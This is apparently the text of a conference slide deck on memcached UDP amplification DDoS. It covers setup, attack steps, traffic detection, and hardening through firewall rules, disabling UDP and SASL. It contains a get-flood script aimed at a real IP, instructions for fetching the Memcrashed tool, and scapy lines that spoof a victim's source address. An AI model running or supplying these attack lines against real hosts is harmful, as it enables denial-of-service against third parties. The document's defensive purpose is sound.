Memcache as udp traffic reflector

Memcache as UDP Reflectors: A Massive Amplified DDoS on the World
(Attack Formulation and Mitigation)
Presenter
Muhammad Morshed Alam
AmberIT Limited
morshed@amberit.com.bd
<Arbor Networks> <Shodan Stats>
Outlines
• Memcache overview
• Memcache Variables and Commands
• Memcache DDoS Amplification Attack formulation,
Amplification Factor
• Memcache DDoS Tools (set and get requests, spoof UDP
packets)
• Mitigation (securing memcache servers using firewall
and SASL authentication)
Memcached Overview
• Free & open source, high-performance, distributed memory object caching system
• Uses key-value pairs to store arbitrary data (strings, objects)
• set(key, data) <= saves the data under the key
get(key) => returns the data stored under the key
• add, delete and replace commands strictly insert, remove or overwrite the data of a key
• Optimizes backend database performance by temporarily storing information in cache memory
Memcached mitigates the load on the DB and speeds up the web app response
Install Memcache Service
# sudo apt-get update
# sudo apt-get install memcached
# sudo apt-get install libmemcached-tools
Check the running process:
root@bdnog-memcace:~# ps aux |grep memcache
Output:
memcache 207 0.0 0.1 63388 1952 ? Ssl Apr12 0:02 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1
Install Memcache Service Contd..
Verify open ports with the ss or netstat command:
# ss -tulpn | grep :11211
# netstat -tulpn | grep :11211
Configuration file:
# sudo vi /etc/memcached.conf
Service restart process:
# sudo systemctl restart memcached
Memcache Variables and Commands:
Connecting to the Memcache service:
root@bdnog-memcace:~# telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats
STAT pid 12476
STAT uptime 20
STAT time 1524726956
STAT version 1.4.25 Ubuntu
STAT libevent 2.0.21-stable
STAT pointer_size 64
STAT rusage_user 0.008000
STAT rusage_system 0.004000
STAT curr_connections 1
STAT total_connections 2
STAT connection_structures 2
STAT reserved_fds 20
STAT cmd_get 0
STAT cmd_set 0
STAT cmd_flush 0
STAT cmd_touch 0
STAT get_hits 0
STAT get_misses 0
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 7
STAT bytes_written 0
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT time_in_listen_disabled_us 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 16
STAT hash_bytes 524288
STAT hash_is_expanding 0
STAT malloc_fails 0
STAT bytes 0
STAT curr_items 0
STAT total_items 0
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT evictions 0
STAT reclaimed 0
STAT crawler_reclaimed 0
STAT crawler_items_checked 0
STAT lrutail_reflocked 0
END
Memcache-tools and outputs
# Setting data for a key:
set key 0 3600 16
Welcome to BDNog
STORED
# Getting the value of the key:
get key
VALUE key 0 16
Welcome to BDNog
END
Using the libmemcached-tools commands:
root@bdnog-memcace:~# memcstat --servers 127.0.0.1
Output: the present values of all memcache stats, e.g.,
STAT cmd_get 1
STAT cmd_set 1
root@bdnog-memcace:~# memcdump --servers 127.0.0.1
Output: all keys currently holding cached data, e.g.,
Key
root@bdnog-memcace:~# memcat --servers 127.0.0.1 key
Output: the value stored under that key, e.g.,
Welcome to BDNog
set <keyname> <some_flag> <expiration_in_milliseconds> <length_of_data_to_follow>
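An added example (not code from the slides): a small Python encoder/parser for the memcached text protocol shown above, plus the 8-byte header memcached prepends to every UDP datagram, ending with a local calculation of how many response bytes one UDP get of a key produces per request byte. Function names and the 1400-byte datagram payload size are assumptions for this example.

```python
import struct

# Added example, not from the slides: encode/decode the memcached text protocol
# used above and the 8-byte header memcached puts in front of every UDP datagram.
# Function names and the 1400-byte datagram payload size are assumptions.
UDP_HEADER = struct.Struct("!HHHH")  # request id, seq no, datagram count, reserved

def build_set(key, value, flags=0, exptime=0):
    """'set <key> <flags> <exptime> <bytes>\\r\\n<data>\\r\\n'. <bytes> is the
    byte length of the data block, so measure bytes, not characters.
    exptime is in seconds in the memcached protocol."""
    if " " in key or len(key) > 250:
        raise ValueError("key must be at most 250 bytes with no spaces")
    head = "set %s %d %d %d\r\n" % (key, flags, exptime, len(value))
    return head.encode() + value + b"\r\n"

def build_get(key):
    return ("get %s\r\n" % key).encode()

def parse_get_response(data):
    """Parse 'VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n ... END\\r\\n' into
    {key: (flags, data)}; a bare 'END' is a cache miss."""
    items, pos = {}, 0
    while True:
        eol = data.index(b"\r\n", pos)
        line = data[pos:eol]
        if line == b"END":
            return items
        tag, key, flags, nbytes = line.split(b" ")[:4]
        if tag != b"VALUE":
            raise ValueError("unexpected line %r" % line)
        start, end = eol + 2, eol + 2 + int(nbytes)
        if data[end:end + 2] != b"\r\n":
            raise ValueError("data block does not match <bytes>")
        items[key.decode()] = (int(flags), data[start:end])
        pos = end + 2

def udp_frame(payload, request_id=0, max_payload=1400):
    """Split one message into datagrams, each prefixed with the memcached UDP
    header (request id, sequence number, total datagrams, reserved = 0)."""
    chunks = [payload[i:i + max_payload]
              for i in range(0, len(payload), max_payload)] or [b""]
    return [UDP_HEADER.pack(request_id, seq, len(chunks), 0) + chunk
            for seq, chunk in enumerate(chunks)]

def udp_unframe(datagram):
    rid, seq, total, _ = UDP_HEADER.unpack_from(datagram)
    return rid, seq, total, datagram[UDP_HEADER.size:]

def reassemble(datagrams):
    """Order datagrams by (request id, seq) and join the payloads."""
    parts = sorted(udp_unframe(d) for d in datagrams)
    if len(parts) != parts[0][2]:
        raise ValueError("expected %d datagrams, got %d" % (parts[0][2], len(parts)))
    return b"".join(p[3] for p in parts)

def amplification_factor(key, value):
    """Bytes a server would send back for one UDP 'get' of this key, divided
    by the bytes of the request datagram. Computed locally from a constructed
    reply; nothing is sent on the network."""
    request = b"".join(udp_frame(build_get(key)))
    reply = b"VALUE %s 0 %d\r\n%s\r\nEND\r\n" % (key.encode(), len(value), value)
    return len(b"".join(udp_frame(reply))) / len(request)
```

A 1000-byte value already yields over 50 reply bytes per request byte; the ratio grows with the value size up to the server's item limit.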
Vulnerable Memcached Server
• No authentication required to access it
• Unauthorized clients can inject a large payload into the cache
• Listens on unreliable UDP port 11211 for requests from any IP address
• UDP allows unreliable, connectionless delivery, so target hosts receive data without prior consent
Stats of vulnerable memcached services available on the Internet (Qrator Lab and Akamai)
1. Find a vulnerable memcache server listening on UDP port 11211 with a high value of the variable limit_maxbytes
2. Run a memcache SET command that fills one key to its maximum size with data to ensure a high payload
3. Send many forged GET requests for that key over UDP continuously, with the SRC IP spoofed to the victim's IP
Attacker's UDP packets contain:
• UDP GET key requests
• Size: 15B, SRC IP: spoofed target IP, DST port: 11211, DST IP: memcache host
Vulnerable memcached servers exposed on the Internet and listening on UDP port 11211
<Victims/Targets>
• GET commands are reflected to the victim IP with (key, value)
• The value of DATA is large, i.e., total size = (key, value) × number of requests
• GET request 15B => 750kB response, 50000x amplification (Akamai report)
• SRC IP: memcache host, DST IP: target, SRC port: 11211
Attack Formulation
1. An attacker may use multiple vulnerable memcached servers against a specific target IP by spoofing the SRC IP
2. The target network infrastructure is overwhelmed with UDP traffic
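An added example (not from the slides): detection logic a network hosting a memcached server can run over NetFlow-style records, pairing the small spoofed requests arriving on UDP/11211 with the large replies leaving it, so reflection shows up as a high reply/request byte ratio toward one remote address. The record layout, addresses and thresholds are constructed assumptions.

```python
from collections import defaultdict

# Added example, not from the slides. The network hosting the memcached server
# sees both directions: spoofed 'get' requests into UDP/11211 and the large
# replies out of UDP/11211. Layout, addresses and thresholds are constructed.
# Fields: proto src_ip src_port dst_ip dst_port packets bytes
SAMPLE_FLOWS = """\
udp 198.51.100.7 5000 203.0.113.85 11211 1200 18000
udp 203.0.113.85 11211 198.51.100.7 5000 1200 1680000
udp 203.0.113.9 11211 198.51.100.7 5000 900 1260000
tcp 172.16.11.5 40212 203.0.113.85 11211 12 860
udp 192.0.2.33 53 198.51.100.7 33411 3 420
"""

def parse_flows(text):
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        p, sip, sport, dip, dport, pkts, nbytes = line.split()
        flows.append({"proto": p, "src_ip": sip, "src_port": int(sport),
                      "dst_ip": dip, "dst_port": int(dport),
                      "packets": int(pkts), "bytes": int(nbytes)})
    return flows

def reflection_report(flows, min_ratio=50.0, min_reply_bytes=1_000_000):
    """Pair requests into UDP/11211 with replies out of UDP/11211 per
    (memcached host, remote host) and flag pairs whose reply volume or
    reply/request byte ratio looks like amplification."""
    req = defaultdict(int)
    rep = defaultdict(lambda: [0, 0])
    for f in flows:
        if f["proto"] != "udp":
            continue
        if f["dst_port"] == 11211:
            req[(f["dst_ip"], f["src_ip"])] += f["bytes"]
        elif f["src_port"] == 11211:
            pair = rep[(f["src_ip"], f["dst_ip"])]
            pair[0] += f["packets"]
            pair[1] += f["bytes"]
    findings = []
    for (server, remote), (pkts, nbytes) in rep.items():
        qbytes = req.get((server, remote), 0)
        # No matching request seen means the spoofed gets were not exported
        # or arrived elsewhere; treat the ratio as unbounded rather than skip.
        ratio = nbytes / qbytes if qbytes else float("inf")
        if nbytes >= min_reply_bytes or ratio >= min_ratio:
            findings.append({"memcached_host": server, "victim": remote,
                             "reply_bytes": nbytes, "avg_pkt": nbytes // pkts,
                             "ratio": ratio})
    return sorted(findings, key=lambda x: -x["reply_bytes"])
```

The 1400-byte average reply packet and a ratio near 100:1 toward a single remote host are the signature to alert on; legitimate cache clients talk to the server from the trusted block over TCP and never appear here.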
Memcache Amplification DDoS on bandwidth consumption
Trends of Protocols Used for Reflection
Most DDoS attacks counted were Memcache (DDoSmon stats)
DDoS attack bandwidth of 1.3 Tbps on GitHub !!!
Memcached Reflection Power
Inserting a key value into a vulnerable memcached server:
# apt-get install python-memcache
# python
>>> import memcache
>>> mc=memcache.Client(['1.2.3.4:11211'],debug=True)
>>> mc.set('tot2',3423443534324234234234234)
True
>>> mc.get('tot2')
3423443534324234234234234
Max key value (size) => 1 MB; repeating the get request 1024 times => 1024 MB (1 GB) of reflected UDP traffic !!!!
Flooding the resource with reflected UDP traffic:
# touch get_flood.py
#!/usr/bin/env python
import memcache
mc = memcache.Client(['202.4.96.85:11211'],debug=True)
mc.set('tot2',1347534875923423432423)
for i in range(10000):
    mc.get('tot2')
    print i
root@morshed-Lenovo-G40-70:~# python get_flood.py
MemCached: MemCache: inet:202.4.96.85:11211: connect: timed out. Marking dead.
Dump Packets: (figure)
Memcache Server / Get Requests Sender (diagram)
Dump Output Packets: (figure)
Dump Output Packets (PPS Curve): (figure)
Memcached DDoS Tools
Sends forged UDP packets (with the SRC IP spoofed to the target IP) to vulnerable Memcached servers obtained using the Shodan API
# git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
# apt-get install python3
# pip install shodan ; Shodan search engine client
# pip install scapy ; required to craft UDP packets
Pass the API key obtained from https://account.shodan.io/login and enter the target victim IP address to run the attack
# python3 Memcrashed.py
; "injected" is the key, and an arbitrary value is inserted into the cache
setdata = ("\x00\x00\x00\x00\x00\x00\x00\x00set\x00injected\x000\x003600\x00%s\r\n%s\r\n")
getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n")
; using scapy to set the SRC IP and send the set/get requests on behalf of the victim/target IP
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata))
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata))
Dump Data:
Mitigation
Step-1: Configuring The Firewall:
For TCP:
# /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
For UDP:
# /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Or permanently disable it (e.g. for Zimbra Collaboration):
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Note: save the iptables rules and check them
# iptables -L -v -n
Secure memcached server to avoid DDoS amplification attacks
Step-2: Changing the Configuration:
# sudo vim /etc/memcached.conf
-l 127.0.0.1,172.16.3.1 ; listen only on localhost and the trusted block
-U 0 ; disable UDP listening on port 11211
# sudo systemctl restart memcached
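An added example (not from the slides) that audits the text of memcached.conf for the settings this mitigation changes (-l and -U 0) and for the -S SASL flag enabled in the step that follows; both sample configs are constructed, and plain addresses (no addr:port form) are assumed on the -l line.

```python
import ipaddress

# Added example, not from the slides: audit /etc/memcached.conf text for -l,
# -U 0 and -S. Both sample configs are constructed; -l is assumed to carry
# plain addresses, not the addr:port form newer memcached also accepts.
WEAK_CONF = """\
# constructed sample: exposed on every interface, UDP left on, no SASL
-m 64
-p 11211
-u memcache
-l 0.0.0.0
"""
HARDENED_CONF = """\
-m 64
-p 11211
-u memcache
-l 127.0.0.1,172.16.3.1
-U 0
-S
"""

def parse_conf(text):
    """memcached.conf holds one command-line option per line; return
    {option: value}. Comments and non-option lines are ignored."""
    opts = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line.startswith("-"):
            continue
        parts = line.split(None, 1)
        opts[parts[0]] = parts[1] if len(parts) > 1 else ""
    return opts

def audit(text):
    opts = parse_conf(text)
    findings = []
    # Only '-U 0' turns UDP off; memcached before 1.5.6 (such as the 1.4.25
    # shown in the slides) enables UDP on port 11211 when -U is absent.
    udp = opts.get("-U")
    if udp != "0":
        shown = "-U " + udp if udp else "no -U, on by default before 1.5.6"
        findings.append("UDP enabled (%s): add '-U 0'" % shown)
    listen = opts.get("-l")
    if listen is None:
        findings.append("no -l: memcached listens on all interfaces")
    else:
        for addr in listen.split(","):
            ip = ipaddress.ip_address(addr.strip())
            if ip.is_unspecified or ip.is_global:
                findings.append("-l %s exposes the service publicly" % addr.strip())
    if "-S" not in opts:
        findings.append("no -S: SASL authentication is disabled")
    return findings
```

Run it against the live file with `audit(open("/etc/memcached.conf").read())` after each change and before restarting the service; an empty list means all three settings match the hardened state.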
Secure memcached server to avoid DDoS amplification attacks contd…
Validation of filtering rules:
# nc 202.4.96.144 11211
# nc -u 202.4.96.144 11211
# telnet 202.4.96.144 11211
# sudo nmap 202.4.96.144 -p 11211 -sU -sS --script memcached-info
Adding Authorized user using SASL to Memcached Server:
# memcstat --servers="127.0.0.1"
Output:
Server: 127.0.0.1 (11211)
pid: 3831
uptime: 9
time: 1520028517, version: 1.4.25 . . .
SASL adds authentication for memcached clients.
# sudo vim /etc/memcached.conf
-S ; enable SASL
-vv ; enable verbose output to /var/log/memcached
Save and close the file.
# sudo systemctl restart memcached
# sudo journalctl -u memcached
Output:
Apr 27 22:03:58 memcached systemd-memcached-wrapper[2760]: Initialized SASL.
Adding Authorized user using SASL to Memcached Server contd…
# sudo apt-get install sasl2-bin ; SASL user database tools
# sudo mkdir -p /etc/sasl2
# sudo vi /etc/sasl2/memcached.conf
mech_list: plain
log_level: 5
sasldb_path: /etc/sasl2/memcached-sasldb2
# sudo saslpasswd2 -a memcached -c -f /etc/sasl2/memcached-sasldb2 morshed
# sudo systemctl restart memcached
# memcstat --servers="127.0.0.1" --username=morshed --password=*passwd*